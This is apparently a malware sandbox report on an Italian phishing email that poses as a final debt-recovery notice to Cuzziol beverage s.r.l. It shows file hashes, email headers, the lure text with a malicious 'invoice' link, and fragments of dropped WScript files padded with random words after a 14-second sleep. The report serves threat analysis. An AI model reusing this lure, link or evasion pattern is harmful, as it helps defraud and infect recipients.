                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (3231)
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:5B3D8E72617B8D9E9C70445DF2253632
                          SHA1:3EB1DB8E07FD3E170567F0CC24CC689478B507E3
                          SHA-256:E23DFB82B3409AE5AF9B5D0581E7B7BEA7487E2ABA48559267770F73049F50CC
                          SHA-512:0368B6C77336C46172D0CCFF08C4EED51F0D6D3D9A583E17BD3ADFF51C8DE034701B2F7A891BF54F0D2617977172619089E4E4A2C45C1A1A55EF4BC247556236
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (3231)
                          Category:dropped
                          Size (bytes):72534
                          Entropy (8bit):4.645176136248325
                          Encrypted:false
                          SSDEEP:
                          MD5:5B3D8E72617B8D9E9C70445DF2253632
                          SHA1:3EB1DB8E07FD3E170567F0CC24CC689478B507E3
                          SHA-256:E23DFB82B3409AE5AF9B5D0581E7B7BEA7487E2ABA48559267770F73049F50CC
                          SHA-512:0368B6C77336C46172D0CCFF08C4EED51F0D6D3D9A583E17BD3ADFF51C8DE034701B2F7A891BF54F0D2617977172619089E4E4A2C45C1A1A55EF4BC247556236
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (2658)
                          Category:dropped
                          Size (bytes):16059
                          Entropy (8bit):4.920610774712818
                          Encrypted:false
                          SSDEEP:
                          MD5:B19F8EA252CE589AA5E90C66883E077B
                          SHA1:DBEA9AA7523DA335E32D44AFB98D55DACF2E691B
                          SHA-256:59FC39DEA4CB43BAFC5E43C5666BACBF2C0F369697CCB88BF61B529501780121
                          SHA-512:E0F06218E9750271A893967D36BE9FBF77553A8DD4E1C716959F503FC9C1897E428EEA7B0834D7D53E12A345EA1DB61590591A2EECDCCC115E48CD13DEF10A4F
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec
                          File type:CDFV2 Microsoft Outlook Message
                          Entropy (8bit):3.5650909496067116
                          TrID:
                          • Outlook Message (71009/1) 58.92%
                          • Outlook Form Template (41509/1) 34.44%
                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                          File name:I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
                          File size:42'496 bytes
                          MD5:cb84c33545673307198ca7dc864e8e5f
                          SHA1:f9cbb6e67738eb8235d03d7df218aeea6e510ec9
                          SHA256:396e4d924a45d551c2c8bcfd147112bbe3128885e22e1e7a593006117759132b
                          SHA512:9ca1087e13dc31fe6f4c9dba6491e591c19d0e20abb76d326721449be1e61b83efadba87c04b350306279522e3933b03a5378ca967926964726ddb5833cd8b8b
                          SSDEEP:768:2h4JoM4xXS6fzH6HCoeN1gXPRv/p3CcjyVMAYsO:UHiGH6HCoFDyVMU
                          TLSH:97137B1536E58B0AF2BBDF364DE281878532BCD1ED21C78F3291734F1572981A961B2B
                          File Content Preview:........................>......................................................................................................................................................................................................................................
                          Subject:I: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..
                          From:Franco Bin <franco.bin@cuzziol.it>
                          To:Andrea Ceccherini <andrea.ceccherini@cuzziol.it>
                          Cc:
                          BCC:
                          Date:Mon, 18 Nov 2024 10:41:46 +0100
                          Communications:
                          • SPAM ? From: gianluca.mucciolo80@pec.it <gianluca.mucciolo80@pec.it> Sent: Monday, 18 November 2024 02:10 To: Cuzziol beverage s.r.l. <cuzziolbeveragesrl@pec.it> Subject: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.. (Final request for payment for Cuzziol beverage s.r.l.) Good morning, Cuzziol beverage s.r.l., with registered office in Santa Lucia di Piave (TV), Via Maiorana 1, 05050740264. With this communication I wish to draw your attention to the fact that, under the contract concluded on 10/05/2024, you undertook to pay me the sum of EUR 562.13. To date I have not yet received payment, despite the numerous reminders already sent. I give notice that, if you do not pay voluntarily within five days of receipt of this letter, I will be forced to hand the matter over to my lawyer to begin legal debt-recovery proceedings, without sending any further notices or reminders. Please note that this communication constitutes a formal notice of default and interrupts the limitation period. The invoice can be downloaded via the link below: Fattura (Invoice) <https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L> Kind regards,
                          Attachments:
                            Key: Value
                            Received: from EXCH01.cuzziol.local ([fe80::e0c5:cd68:87d8:c955]) by
                            Transport; Mon, 18 Nov 2024 10:41:47 +0100
                            2024 10:41:46 +0100
                            EXCH01.cuzziol.local ([fe80:e0c5:cd68:87d8:c955%7]) with mapi id
                            15.01.2242.012; Mon, 18 Nov 2024 10:41:46 +0100
                            Content-Type: application/ms-tnef; name="winmail.dat"
                            Content-Transfer-Encoding: binary
                            From: Franco Bin <franco.bin@cuzziol.it>
                            To: Andrea Ceccherini <andrea.ceccherini@cuzziol.it>
                            Subject: I: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..
                            Thread-Topic: Ultima richiesta di pagamento finale per Cuzziol beverage
                            Thread-Index: AQGYR3TgiJ9LkyNCcqwiXi+C6afMGrNCrTEA
                            Date: Mon, 18 Nov 2024 10:41:46 +0100
                            Message-ID: <be33c0faf4c74e5680ffaaff56322dd0@cuzziol.it>
                            References: <opec210312.20241118031011.95256.594.1.52@pec.aruba.it>
                            In-Reply-To: <opec210312.20241118031011.95256.594.1.52@pec.aruba.it>
                            Accept-Language: it-IT, en-US
                            Content-Language: it-IT
                            X-MS-Has-Attach:
                            X-MS-Exchange-Organization-SCL: -1
                            X-MS-TNEF-Correlator: <be33c0faf4c74e5680ffaaff56322dd0@cuzziol.it>
                            MIME-Version: 1.0
                            X-MS-Exchange-Organization-MessageDirectionality: Originating
                            X-MS-Exchange-Organization-AuthSource: EXCH01.cuzziol.local
                            X-MS-Exchange-Organization-AuthAs: Internal
                            X-MS-Exchange-Organization-AuthMechanism: 04
                            X-Originating-IP: [192.168.1.58]
                            X-MS-Exchange-Organization-Network-Message-Id: 9c6cb000-d48c-43f0-293a-08dd07b53826
                            Return-Path: franco.bin@cuzziol.it
                            X-MS-Exchange-Organization-AVStamp-Enterprise: 1.0
                            X-MS-Exchange-Transport-EndToEndLatency: 00:00:00.3300552
                            X-MS-Exchange-Processed-By-BccFoldering: 15.01.2242.012
                            date: Mon, 18 Nov 2024 10:41:46 +0100

                            Icon Hash:c4e1928eacb280a2